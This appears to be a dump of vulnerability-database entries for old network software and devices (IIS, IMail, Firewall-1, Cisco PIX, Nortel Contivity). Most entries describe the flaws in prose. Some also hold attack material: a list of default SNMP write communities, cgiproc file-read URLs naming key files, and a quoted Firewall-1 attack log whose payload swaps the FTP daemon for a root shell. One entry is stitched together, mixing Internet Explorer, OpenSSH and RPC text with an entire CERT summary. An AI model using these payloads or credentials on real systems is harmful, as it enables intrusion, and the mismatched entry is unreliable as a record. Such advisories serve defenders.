VARIoT IoT vulnerabilities database

IIS 4.0 and 5.0 allows remote attackers to cause a denial of service by sending many URLs with a large number of escaped characters, aka the "Myriad Escaped Characters" Vulnerability. Requesting a malformed URL containing numerous escaped characters will cause Microsoft IIS performance to dramatically decrease until the URL has been processed

Ipswitch IMAIL server 6.02 and earlier allows remote attackers to cause a denial of service via the AUTH CRAM-MD5 command. Due to the implementation of IMail's authentication scheme, the server could be remotely forced to stop responding to login requests. If the client fails to terminate the connection, IMail will not be able to authenticate any other users due to the fact that it can only authorize one user at a time. Once the client times out the connection, IMail will regain normal functionality. Otherwise the service will have to be restarted

Buffer overflow in WebObjects.exe in the WebObjects Developer 4.5 package allows remote attackers to cause a denial of service via an HTTP request with long headers such as Accept. apple's WebObjects Exists in unspecified vulnerabilities.None. A denial-of-service vulnerability exists in Apple's WebObjects 4.5 Developer, a popular platform for developing web-based applications. The vulnerable version is Windows NT 4.0 SP5, when run in conjunction with the CGI-adapter and IIS 4.0. An HTTP request sent with a long header (ie, over 4.1K), will crash webobjects.exe. This may also permit the attacker to remotely execute code with the privilege of IIS, but this has not been verified. This vulnerability is reportedly present only in installations running under a development license. Those licensed for deployment are not affected

IIS 4.0 and 5.0 does not properly perform ISAPI extension processing if a virtual directory is mapped to a UNC share, which allows remote attackers to read the source code of ASP and other files, aka the "Virtualized UNC Share" vulnerability. Files located on the local drive where IIS is installed is not affected by this vulnerability

Cisco Secure PIX Firewall does not properly identify forged TCP Reset (RST) packets, which allows remote attackers to force the firewall to close legitimate connections. The attacker would have to possess detailed knowledge of the connection table in the firewall (which is used to track outgoing connections and disallow any connections from the external network that were not initiated by an internal machine) or be able to otherwise determine the required IP address and port information to exploit this

IIS 4.0 allows attackers to cause a denial of service by requesting a large buffer in a POST or PUT command which consumes memory, aka the "Chunked Transfer Encoding Buffer Overflow Vulnerability.". Microsoft IIS 4.0, circa March 2000, contained a vulnerability that allowed an intruder to consume unlimited memory on a vulnerable server. Due to unchecked buffer code that handles chunked encoding transfers, remote users are able to consume CPU cycles in Microsoft IIS until the program is rendered completely unstable and eventually crash. This can cause the server to hang indefinitely until the remote user cancels the session or until the IIS service is stopped and restarted

Buffer overflow in the web server for Norton AntiVirus for Internet Email Gateways allows remote attackers to cause a denial of service via a long URL. Due to unchecked buffer code, the program will crash causing a Dr. Watson error when a URL consisting of a large number of characters is requested

Firewall-1 3.0 and 4.0 leaks packets with private IP address information, which could allow remote attackers to determine the real IP address of the host that is making the connection. A vulnerability exists in which Checkpoint Firewall-1 will expose internal addresses to machines outside the network. Under seemingly normal load conditions, according to the poster of this vulnerability, 40% CPU utilization with 200+ active connections, Firewall-1 will attempt to establish connections utilizing the internal address. As this address is either non-routable, or internal, a retransmission will occur; this packet will have the correct address rewritten, but will use the same source port. This may be particularly useful to attackers conducting client side attacks. These problems have been seen on both NT and Solaris versions of FW-1, although the poster indicated that not enough data was available to directly state the Solaris version was vulnerable in the same ways, or to the same degrees

Buffer overflow in SGI Omron WorldView Wnn allows remote attackers to execute arbitrary commands via long JS_OPEN, JS_MKDIR, or JS_FILE_INFO commands. A remote buffer overflow exists in the Asian language servers portion of a number of different implementations of Wnn. It has been reported that only systems that have WorldView Japanese, Korean, and Chinese installed are vulnerable to this issue. Wnn is a Kana-Kanji translation system, most commonly used for foreign language support in Unix systems. An overflow exists when the server receives a long string with a Wnn command, such as JS_OPEN, JS_MKDIR or JS_FILE_INFO included. By creating a buffer containing machine executable code, it is possible to cause a remote system running the jserver daemon to execute arbitrary commands as the user the daemon is running as. This is frequently root. It is a server-client application, and the Jserver part acts as the server side, providing translation services for clients. Some versions of Wnn have a remote buffer overflow vulnerability. Carefully constructed strings leading to overflows have the potential to execute arbitrary commands with privileges owned by the Jserver, usually root

The window.showHelp() method in Internet Explorer 5.x does not restrict HTML help files (.chm) to be executed from the local host, which allows remote attackers to execute arbitrary commands via Microsoft Networking. Versions of the OpenSSH server prior to 3.7.1 contain buffer management errors. While the full impact of these vulnerabilities are unclear, they may lead to memory corruption and a denial-of-service situation. A vulnerability exists in Microsoft's Remote Procedure Call (RPC) implementation. A remote attacker could exploit this vulnerability to cause a denial of service. An exploit for this vulnerability is publicly available. There is a remote buffer overflow in many versions of Microsoft Windows that allows attackers to execute arbitrary code with system privileges. We are sending this message to help ensure that administrators have not overlooked one or more of these vulnerabilities. There have been several recent vulnerabilities affecting OpenSSH. It is unclear if these issues are exploitable, but they are resolved in version 3.7.1. These four additional flaws are believed to be relatively minor, and are scheduled to be included in the next version of OpenSSH. Exploitation of this vulnerability may lead to a remote attacker gaining privileged access to the server, in some cases root access. VU#209807 - Portable OpenSSH server PAM conversion stack corruption http://www.kb.cert.org/vuls/id/209807 There is a vulnerability in portable versions of OpenSSH 3.7p1 and 3.7.1p1 that may permit an attacker to corrupt the PAM conversion stack. Please check the vulnerability notes for resolutions and additional details. Thank you. -----BEGIN PGP SIGNED MESSAGE----- CERT Summary CS-2003-04 November 24, 2003 Each quarter, the CERT Coordination Center (CERT/CC) issues the CERT Summary to draw attention to the types of attacks reported to our incident response team, as well as other noteworthy incident and vulnerability information. The summary includes pointers to sources of information for dealing with the problems. Past CERT summaries are available from: CERT Summaries http://www.cert.org/summaries/ ______________________________________________________________________ Recent Activity Since the last regularly scheduled CERT summary, issued in September 2003 (CS-2003-03), we have documented vulnerabilities in the Microsoft Windows Workstation Service, RPCSS Service, and Exchange. We have received reports of W32/Swen.A, W32/Mimail variants, and exploitation of an Internet Explorer vulnerability reported in August of 2003. For more current information on activity being reported to the CERT/CC, please visit the CERT/CC Current Activity page. The Current Activity page is a regularly updated summary of the most frequent, high-impact types of security incidents and vulnerabilities being reported to the CERT/CC. The information on the Current Activity page is reviewed and updated as reporting trends change. CERT/CC Current Activity http://www.cert.org/current/current_activity.html 1. W32/Mimail Variants The CERT/CC has received reports of several new variants of the 'Mimail' worm. The most recent variant of the worm (W32/Mimail.J) arrives as an email message alleging to be from the Paypal financial service. The message requests that the recipient 'verify' their account information to prevent the suspension of their Paypal account. Attached to the email is an executable file which captures this information (if entered), and sends it to a number of email addresses. Current Activity - November 19, 2003 http://www.cert.org/current/archive/2003/11/19/archive.html#mimaili 2. CERT Advisory CA-2003-28 Buffer Overflow in Windows Workstation Service http://www.cert.org/advisories/CA-2003-28.html Vulnerability Note VU#567620 Microsoft Windows Workstation service vulnerable to buffer overflow when sent specially crafted network message http://www.kb.cert.org/vuls/id/567620 3. CERT Advisory CA-2003-27 Multiple Vulnerabilities in Microsoft Windows and Exchange http://www.cert.org/advisories/CA-2003-27.html Vulnerability Note VU#575892 Buffer overflow in Microsoft Windows Messenger Service http://www.kb.cert.org/vuls/id/575892 Vulnerability Note VU#422156 Microsoft Exchange Server fails to properly handle specially crafted SMTP extended verb requests http://www.kb.cert.org/vuls/id/422156 Vulnerability Note VU#467036 Microsoft Windows Help and support Center contains buffer overflow in code used to handle HCP protocol http://www.kb.cert.org/vuls/id/467036 Vulnerability Note VU#989932 Microsoft Windows contains buffer overflow in Local Troubleshooter ActiveX control (Tshoot.ocx) http://www.kb.cert.org/vuls/id/989932 Vulnerability Note VU#838572 Microsoft Windows Authenticode mechanism installs ActiveX controls without prompting user http://www.kb.cert.org/vuls/id/838572 Vulnerability Note VU#435444 Microsoft Outlook Web Access (OWA) contains cross-site scripting vulnerability in the "Compose New Message" form http://www.kb.cert.org/vuls/id/435444 Vulnerability Note VU#967668 Microsoft Windows ListBox and ComboBox controls vulnerable to buffer overflow when supplied crafted Windows message http://www.kb.cert.org/vuls/id/967668 4. Multiple Vulnerabilities in SSL/TLS Implementations Multiple vulnerabilities exist in the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols allowing an attacker to execute arbitrary code or cause a denial-of-service condition. CERT Advisory CA-2003-26 Multiple Vulnerabilities in SSL/TLS Implementations http://www.cert.org/advisories/CA-2003-26.html Vulnerability Note VU#935264 OpenSSL ASN.1 parser insecure memory deallocation http://www.kb.cert.org/vuls/id/935264 Vulnerability Note VU#255484 OpenSSL contains integer overflow handling ASN.1 tags (1) http://www.kb.cert.org/vuls/id/255484 Vulnerability Note VU#380864 OpenSSL contains integer overflow handling ASN.1 tags (2) http://www.kb.cert.org/vuls/id/380864 Vulnerability Note VU#686224 OpenSSL does not securely handle invalid public key when configured to ignore errors http://www.kb.cert.org/vuls/id/686224 Vulnerability Note VU#732952 OpenSSL accepts unsolicited client certificate messages http://www.kb.cert.org/vuls/id/732952 Vulnerability Note VU#104280 Multiple vulnerabilities in SSL/TLS implementations http://www.kb.cert.org/vuls/id/104280 Vulnerability Note VU#412478 OpenSSL 0.9.6k does not properly handle ASN.1 sequences http://www.kb.cert.org/vuls/id/412478 5. Exploitation of Internet Explorer Vulnerability The CERT/CC received a number of reports indicating that attackers were actively exploiting the Microsoft Internet Explorer vulnerability described in VU#865940. These attacks include the installation of tools for launching distributed denial-of-service (DDoS) attacks, providing generic proxy services, reading sensitive information from the Windows registry, and using a victim system's modem to dial pay-per-minute services. The vulnerability described in VU#865940 exists due to an interaction between IE's MIME type processing and the way it handles HTML application (HTA) files embedded in OBJECT tags. CERT Advisory IN-2003-04 Exploitation of Internet Explorer Vulnerability http://www.cert.org/incident_notes/IN-2003-04.html Vulnerability Note VU#865940 Microsoft Internet Explorer does not properly evaluate "application/hta" MIME type referenced by DATA attribute of OBJECT element http://www.kb.cert.org/vuls/id/865940 6. W32/Swen.A Worm On September 19, the CERT/CC began receiving a large volume of reports of a mass mailing worm, referred to as W32/Swen.A, spreading on the Internet. Similar to W32/Gibe.B in function, this worm arrives as an attachment claiming to be a Microsoft Internet Explorer Update or a delivery failure notice from qmail. The W32/Swen.A worm requires a user to execute the attachment either manually or by using an email client that will open the attachment automatically. Upon opening the attachment, the worm attempts to mail itself to all email addresses it finds on the system. The CERT/CC updated the current activity page to contain further information on this worm. Current Activity - September 19, 2003 http://www.cert.org/current/archive/2003/09/19/archive.html#swena 7. Buffer Overflow in Sendmail Sendmail, a widely deployed mail transfer agent (MTA), contains a vulnerability that could allow an attacker to execute arbitrary code with the privileges of the sendmail daemon, typically root. CERT Advisory CA-2003-25 Buffer Overflow in Sendmail http://www.cert.org/advisories/CA-2003-25.html Vulnerability Note VU#784980 Sendmail prescan() buffer overflow vulnerability http://www.kb.cert.org/vuls/id/784980 8. CERT Advisory CA-2003-23 RPCSS Vulnerabilities in Microsoft Windows http://www.cert.org/advisories/CA-2003-23.html Vulnerability Note VU#483492 Microsoft Windows RPCSS Service contains heap overflow in DCOM activation routines http://www.kb.cert.org/vuls/id/483492 Vulnerability Note VU#254236 Microsoft Windows RPCSS Service contains heap overflow in DCOM request filename handling http://www.kb.cert.org/vuls/id/254236 Vulnerability Note VU#326746 Microsoft Windows RPC service vulnerable to denial of service http://www.kb.cert.org/vuls/id/326746 ______________________________________________________________________ New CERT Coordination Center (CERT/CC) PGP Key On October 15, the CERT/CC issued a new PGP key, which should be used when sending sensitive information to the CERT/CC. CERT/CC PGP Public Key https://www.cert.org/pgp/cert_pgp_key.asc Sending Sensitive Information to the CERT/CC https://www.cert.org/contact_cert/encryptmail.html ______________________________________________________________________ What's New and Updated Since the last CERT Summary, we have published new and updated * Advisories http://www.cert.org/advisories/ * Vulnerability Notes http://www.kb.cert.org/vuls * CERT/CC Statistics http://www.cert.org/stats/cert_stats.html * Congressional Testimony http://www.cert.org/congressional_testimony * Training Schedule http://www.cert.org/training/ * CSIRT Development http://www.cert.org/csirts/ ______________________________________________________________________ This document is available from: http://www.cert.org/summaries/CS-2003-04.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. ______________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright \xa92003 Carnegie Mellon University. -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBP8JVOZZ2NNT/dVAVAQGL9wP+I18NJBUBuv7b0pam5La7E7qOQFMn5n78 7i0gBX/dKgaY5siM6jBYYwCbbA7Y0/Jwtby2zHp1s8RHZY5/3JEzElfv4TLlR8rT rb8gJDbpan2JWA6xH9IzqZaSrxrXpNypwU2wWxR2osmbYl8FdV0rD3ZYXJjyi+nU UENALuNdthA= =DD60 -----END PGP SIGNATURE-----

In a number of network devices/operating systems, some default communites are world-writeable and therefore allow remote users to configure properties of the device/OS without any authorization (other than knowledge of the community name). Some of the common default communities/vendors are: public (ascend,cisco,bay networks (nortel),microsoft,sun,3com, aix) private (cisco,bay networks (nortel),microsoft,3com, brocade, aix, netapp) write (ascend, very common) "all private" (sun) monitor (3com) manager (3com) security (3com) OrigEquipMfr (brocade) "Secret C0de" (brocade) admin default password tivoli openview community snmp snmpd system (aix, others) the name of the router (ie, 'gate') The attacks can include manipulating routing tables and corrupting ARP caches, which can lead to further compromise. This type of vulnerability has been seen for quite some time; more information on it is listed in the credit section. NOTE: There may be more products shipping with default read/writeable communities. If you have any more information on what may be vulnerable (more specific firmware versions or corrections), email <vuldb@securityfocus.com>.

IIS Inetinfo.exe allows local users to cause a denial of service by creating a mail file with a long name and a .txt.eml extension in the pickup directory. The process inetinfo.exe will crash, resulting in a Dr. Watson access violation error. Restarting IIS is required in order to regain normal functionality

Check Point Firewall-1 allows remote attackers to bypass port access restrictions on an FTP server by forcing it to send malicious packets that Firewall-1 misinterprets as a valid 227 response to a client's PASV attempt. Firewalls and other systems that inspect FTP application layer traffic may not adequately maintain the state of FTP commands and responses. As a result, an attacker could establish arbitrary TCP connections to FTP servers or clients located behind a vulnerable firewall. A vulnerability exists in the way that Checkpoint FireWall-1 handles packets sent from an FTP server to a connecting client. An attacker may be able to exploit this weakness to establish connections to any machine residing behind a FireWall-1 machine, or send packets in to a network protected by a FireWall-1. FireWall-1 monitors packets from the FTP server to the client, looking for the string "227 " at the beginning of each packet. If FW-1 finds a packet which matches this criteria, it will extract the destination address and port, verify that the specified destination address matches the source of the packet, and allow TCP connections through the firewall to the destination IP and port. In FireWall-1 4.0, these TCP connections can only send data in one direction. Under FireWall-1 3.0 and prior, this limitation does not exist. In addition, under FW-1 4.0 the data cannot be travelling to a port that is defined in FW-1's list of well known TCP services. The details of the vulnerability posted by John McDonald <jm@dataprotect.com> contained the following example: "Here is an example of an attack based on this technique. There is a FireWall-1 machine between gumpe and the 172.16.0.2 server, which only permits incoming FTP connections. 172.16.0.2 is a default Solaris 2.6 install, with the Tooltalk Database vulnerability. We send the datagram directly to the service's TCP port, in spite of this port being blocked by the firewall. Note that since there is no response expected, the one-way restriction doesn't affect this attack. All of our testing was done on a Nokia IPSO machine running FW-1 version 4.0.SP-4. [root@gumpe /root]# strings hackfile localhost """"3333DDDD/bin/ksh.-c.cp /usr/sbin/in.ftpd /tmp/in.ftpd.back ; rm -f /usr/sbin/in.ftpd ; cp /bin/sh /usr/sbin/in.ftpd [root@gumpe /root]# /sbin/ifconfig eth0 mtu 100 [root@gumpe /root]# nc -vvv 172.16.0.2 21 172.16.0.2: inverse host lookup failed: (UNKNOWN) [172.16.0.2] 21 (?) open 220 sol FTP server (SunOS 5.6) ready. ...........................................227 (172,16,0,2,128,7) 500 '........................................... [1]+ Stopped nc -vvv 172.16.0.2 21 [root@gumpe /root]# cat killfile | nc -vv 172.16.0.2 32775 172.16.0.2: inverse host lookup failed: (UNKNOWN) [172.16.0.2] 32775 (?) open sent 80, rcvd 0 [root@gumpe /root]# nc -vvv 172.16.0.2 21 172.16.0.2: inverse host lookup failed: (UNKNOWN) [172.16.0.2] 21 (?) open 220 sol FTP server (SunOS 5.6) ready. ...........................................227 (172,16,0,2,128,7) 500 '........................................... [2]+ Stopped nc -vvv 172.16.0.2 21 [root@gumpe /root]# cat hackfile | nc -vv 172.16.0.2 32775 172.16.0.2: inverse host lookup failed: (UNKNOWN) [172.16.0.2] 32775 (?) open sent 1168, rcvd 0 [root@gumpe /root]# nc -vvv 172.16.0.2 21 172.16.0.2: inverse host lookup failed: (UNKNOWN) [172.16.0.2] 21 (?) open id uid=0(root) gid=0(root) There is an easier way to perform a similar attack on this setup, since the default Solaris FTP daemon allows a bounce attack, but this should suffice to demonstrate the potential severity of this problem." In summary, if a network has an FTP server accesible behind a FireWall-1 firewall, that they allow the outside world access to, it may be possible for an attacker to open TCP connections to certain ports on that FTP machine. This vulnerability is not specific to Firewall-1. It has been demonstrated that the PIX firewall, from Cisco, is also vulnerable. Check Point Firewall-1 is vulnerable

Firewall-1 does not properly filter script tags, which allows remote attackers to bypass the "Strip Script Tags" restriction by including an extra < in front of the SCRIPT tag. Firewall-1 includes the ability to alter script tags in HTML pages before passing them to the client's browser. This alteration invalidates the tag, rendering the script unexecutable by the browser. In version 3, this function can be bypassed by adding an extra opening angle bracket. The tag will be left unmodified, and the browser will be able to execute the contained script. Hostile script could lead to a remote compromise of the client system. Firewall-1 version 4 will alter the tag as expected

cgiproc CGI script in Nortel Contivity HTTP server allows remote attackers to read arbitrary files by specifying the filename in a parameter to the script. The Contivity series is an external network switch product developed by Nortel. The newer Contivity switch includes an httpd server running on the VxWorks operating system to provide a remote Web-based management interface.  A vulnerability exists in the "cgiproc" script implementation of the Web management interface of the Contivity series switches. A remote attacker could use this vulnerability to conduct a denial of service attack on the switch or view arbitrary system files.  Because the user input is not sufficiently filtered, if you pass metacharacters to the cgiporc program, such as "!" Or "$", the system will crash. Another vulnerability of cgiproc is the lack of authentication when requesting a management page. This enables an attacker to view any file in the web server. A total system crash can occur as a result of exploiting a vulnerability in a cgi-bin program called "cgiproc" that is included with the webserver. If metacharacters such as "!", or "$" are passed to cgiproc, the system will crash (because the characters are not escaped). foo <foo@blacklisted.intranova.net> provided the following example: http://x.x.x.x/manage/cgi/cgiproc?$ [crash] No evidence of this problem being exploited is saved in the logs. foo <foo@blacklisted.intranova.net> also provided an example for this vulnerability: http://x.x.x.x/manage/cgi/cgiproc?Nocfile=/name/and/path/of/file. (interesting places to look: /system/filelist.dat, /system/version.dat, /system/keys, /system/core, etc.) All that is written to the logs when this is exploited is below: 09:44:23 tEvtLgMgr 0 : Security [12] Management: Request for cgiproc denied. requires login In order to perform the operations detailed in the report, the "attackers" must be internal, private side users or authenticated tunnel users and the site administrator must allow them HTTP as a management protocol

cgiproc CGI script in Nortel Contivity HTTP server allows remote attackers to cause a denial of service via a malformed URL that includes shell metacharacters. The Contivity series is an external network switch product developed by Nortel. The newer Contivity switch includes an httpd server running on the VxWorks operating system to provide a remote Web-based management interface.  A vulnerability exists in the "cgiproc" script implementation of the Web management interface of the Contivity series switches. A remote attacker could use this vulnerability to conduct a denial of service attack on the switch or view arbitrary system files.  Because the user input is not sufficiently filtered, if you pass metacharacters to the cgiporc program, such as "!" Or "$", the system will crash. Another vulnerability of cgiproc is the lack of authentication when requesting a management page. This enables an attacker to view any file in the web server. A total system crash can occur as a result of exploiting a vulnerability in a cgi-bin program called "cgiproc" that is included with the webserver. If metacharacters such as "!", or "$" are passed to cgiproc, the system will crash (because the characters are not escaped). foo <foo@blacklisted.intranova.net> provided the following example: http://x.x.x.x/manage/cgi/cgiproc?$ [crash] No evidence of this problem being exploited is saved in the logs. foo <foo@blacklisted.intranova.net> also provided an example for this vulnerability: http://x.x.x.x/manage/cgi/cgiproc?Nocfile=/name/and/path/of/file. (interesting places to look: /system/filelist.dat, /system/version.dat, /system/keys, /system/core, etc.) All that is written to the logs when this is exploited is below: 09:44:23 tEvtLgMgr 0 : Security [12] Management: Request for cgiproc denied. requires login In order to perform the operations detailed in the report, the "attackers" must be internal, private side users or authenticated tunnel users and the site administrator must allow them HTTP as a management protocol

Intel InBusiness E-mail is a small application server. This product has a security vulnerability that allows unauthorized remote attackers to delete arbitrary files on the hard disk and change the configuration file of the e-mail workstation. Under certain conditions, remote attackers also It is possible to read the e-mail of any user in the system. Details: This e-mail workstation runs the VxWorks operating system and uses a 486 SX25 processor. A daemon called "daynad" is bound to TCP port 244. By connecting to this service port, you can execute many commands without going through any security authentication. By simply establishing a TCP connection to this port, the following commands can be executed: FormSet: After the next restart, this e- The mail workstation will be restored to the factory state. In this state, the e-mail workstation will use a DHCP server to obtain its own IP address. This also means that the attacker can connect to e without any password after the next restart. -Mail workstation and complete control of the entire device. FormProtect: After the next restart, the e-mail workstation will be restored to the factory state and all passwords will be disabled. Only reconnecting Use the FormSet command to restore to port 244. MakeDir: Create a directory on the hard disk Remove: Remove the specified file from the hard disk, which may be the user's mail or other files. Z: This command will provide a UNIX-type login prompt interface. Enter the password of the super user to enter. If the password is reset using FormSet, the attacker may log in without the password. Once logged in, the attacker may execute arbitrary commands to operate the hard disk. & Lt; * Source: Kit Knox (kit@CONNECTNET.COM) *>. e-mail

IMail IMONITOR status.cgi CGI script allows remote attackers to cause a denial of service with many calls to status.cgi. IMail includes a service called IMail Monitor which is used for local and remote performance measuring and diagnostics. It includes a small webserver operating on port 8181 to support web-based monitoring. One of the cgi scripts, status.cgi, is used to determine which services are currently running and create a web pafge to report this information. Multiple simultaneous requests for status.cgi will cause the software to crash, with a Dr. Watson error of "Invalid Memory Address". There is a vulnerability in the IMail IMONITOR status.cgi CGI script

Cisco Resource Manager (CRM) 1.0 and 1.1 creates world-readable log files and temporary files, which may expose sensitive information, to local users such as user IDs, passwords and SNMP community strings. Cisco Resource Manager is prone to a information disclosure vulnerability. Attackers can exploit this issue to gain access to sensitive information

Cisco PIX Private Link 4.1.6 and earlier does not properly process certain commands in the configuration file, which reduces the effective key length of the DES key to 48 bits instead of 56 bits, which makes it easier for an attacker to find the proper key via a brute force attack. Cisco Pix Private Link is prone to a remote security vulnerability. Attackers can exploit this issue to perform unauthorized actions. This may aid in further attacks